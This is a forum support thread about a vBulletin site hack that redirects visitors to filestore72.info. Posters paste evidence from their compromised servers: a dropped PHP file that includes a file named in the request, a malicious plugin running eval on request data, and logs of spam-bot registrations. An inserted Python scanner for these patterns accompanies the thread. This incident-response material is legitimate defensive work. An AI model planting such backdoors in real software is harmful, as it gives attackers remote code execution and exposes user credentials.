Yes, I would uninstall VBSEO
VBSEO is down but luckily the uninstall instructions with the URL Rewrite rules so links don't break are still available in the "Way Back" machine - http://web.archive.org/web/201301221...all-vbseo-238/
Vbulletin 4.2.0 pl3 hacked redirect to filestore72.info
-
I have done the best I can to make it secure but my advice would be to remove that old version. What do you think Joe? I always value your opinions.
Thanks
-
Hey guys, I am working on a client site with a similar issue and I believe it is tied to the use of Vbseo 3.6. He is using Vbulletin 4.2 but still has Vbseo 3.6 and seeing as Vbseo no longer exists he has no way to get the latest version. Is there a patch available to fix this without doing an upgrade?
Thanks
-
Ok I'm digging deeper.
I just found a file called my.log in the root of the forum. It contains 2 users' info ... like this:
Code:
Array
(
    [userid] => 11582
    [usergroupid] => 25
    [membergroupids] =>
    [infractiongroupids] =>
    [username] => username here
    [password] => password here
    [salt] => salt code here
    [email] => email.address.here
)
Code:
[Sun Nov 10 06:36:29 2013] [error] [client 178.151.216.90] (36)File name too long: access to /index.php++++++++++++++++++++++++++++++++++++++++++++++++Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Myncalleleabs";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff;+Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Guedgecrele";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff;+Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Guedgecrele";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff;+Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Myncalleleabs";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff; failed, referer: http://forum.censored.de/index.php++++++++++++++++++++++++++++++++++++++++++++++++Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Myncalleleabs%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Guedgecrele%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Guedgecrele%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Myncalleleabs%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF;
[Sun Nov 10 06:37:26 2013] [error] [client 74.91.17.226] (36)File name too long: access to /index.php+++++++++++++++++++++++++++++++++Result:+using+proxy+184.73.192.181:3128;+GET-timeouts+1;+chosen+nickname+"bamilesqshuzea3914";+ReCaptcha+decoded;+(JS);+registered+(registering+only+mode+is+ON);+TryAntiSFS=1;+Result:+chosen+nickname+"bjnessdark9685";+ReCaptcha+decoded;+(JS);+registered+(registering+only+mode+is+ON);+TryAntiSFS=1; failed, referer: http://forum.censored/index.php+++++++++++++++++++++++++++++++++Result:+using+proxy+184.73.192.181:3128;+GET-timeouts+1;+chosen+nickname+%22bamilesqshuzea3914%22;+ReCaptcha+decoded;+%28JS%29;+registered+%28registering+only+mode+is+ON%29;+TryAntiSFS=1;+Result:+chosen+nickname+%22bjnessdark9685%22;+ReCaptcha+decoded;+%28JS%29;+registered+%28registering+only+mode+is+ON%29;+TryAntiSFS=1;
Code:
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>
-
1. They are ok. No one who should not have access is getting access.
2. We had one 3 months ago that we deleted, that one probably gained access through some PHP Root files I found and deleted.
4. I went to each of them and disabled them one by one.
Filestore still comes back after 1-2 days. Really no idea what to do.
vBulletin is running 4.2.1 (yes I know there is a 4.2.2)
All old vB files got deleted. All extra PHP files got deleted.
Found some PHP Root files in Attachment folders, all got deleted.
I protected the 777 folders.
Checked the template
So no rogue admins, no root php files.
Filestore still comes back.
Thanks
-
Change your admin passwords.
Check for any admins you don't recognise.
Password protect your admincp folder using .htaccess
Go through each plug in and delete any that you don't recognise.
If you're still having problems after that, please start your own topic with full details of the problem.
-
Ok my problem persists. Any ideas?
I don't use vBSEO. I have disabled plugins one by one. The filestore hack always comes back after 1-2 days.
-
Ok. I'm also posting here. Same problem. No vbSEO installed. Did everything from what's been suggested. The filestore problem still persists even after the upgrade.
I'm looking into plugins and I see this:
A Plugin Named: 123
Product: vBulletin
Hook Location: faq_complete
This is the code:
Code:
eval(stripslashes($_REQUEST[ass]));
Do you have any ideas on how to fix this? It keeps coming back.
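Added example, not part of the original post and not vBulletin's own code: a Python heuristic that flags PHP in which a request-controlled superglobal reaches a code-execution or file-inclusion construct, the pattern shared by the plugin above and the PHP file quoted further up this page. The record names and the two benign snippets are constructed for illustration.

```python
import re

# PHP superglobals an HTTP client controls directly.
TAINT = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE|FILES)\b")
# Constructs that execute PHP, load a file as PHP, or run a command.
SINK = re.compile(
    r"\b(eval|assert|include(?:_once)?|require(?:_once)?|system|exec|"
    r"passthru|shell_exec|popen|proc_open|create_function)\b\s*\(?", re.I)

def sink_argument(code, start):
    """Text passed to the sink: up to its closing ')' or the ending ';'."""
    depth = 0
    for i in range(start, len(code)):
        ch = code[i]
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth < 0:          # closed the sink's own parenthesis
                return code[start:i]
        elif ch == ";" and depth == 0:
            return code[start:i]
    return code[start:]

def scan(records):
    """records: (name, php_code) pairs -> [(name, sink, argument)]."""
    # Heuristic: no tracking through variables, no de-obfuscation.
    hits = []
    for name, code in records:
        for m in SINK.finditer(code):
            arg = sink_argument(code, m.end()).strip()
            if TAINT.search(arg):
                hits.append((name, m.group(1).lower(), arg))
    return hits

# Constructed records: the first two reuse code quoted in this thread
# (names are hypothetical), the last two are benign snippets for contrast.
SAMPLES = [
    ("plugin 123 @ faq_complete", "eval(stripslashes($_REQUEST[ass]));"),
    ("dropped-file.php", '<? echo ini_get("safe_mode"); include($_GET["file"]); '
                         'ini_restore("safe_mode"); include($_GET["ss"]); ?>'),
    ("template plugin", "eval('$out = \"' . $cached_template . '\";');"),
    ("paging plugin", "$p = intval($_GET['page']); include(DIR . '/extra.php');"),
]

if __name__ == "__main__":
    for hit in scan(SAMPLES):
        print(hit)
```

Feed it the code of each plugin and of any unexpected PHP file; a hit is a lead for manual review, and an empty result does not prove a site is clean.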
-
Look at the links in Post # 3, and update VBSEO.
To clear the current infection just go to the Admin CP -> Plugins & Products -> Product Manager and DISABLE then Re-Enable any product listed. This will force a refresh of the datastore which is where the code usually is.
-
But do all third party addons ALWAYS have exploits? I'm trying to pinpoint the plugins we have in common here, if the exploit is actually in the plugin.
-
Any third party addons can have exploits, we don't track those. And unless the addon developer gets a notification about them, they might not be fixed.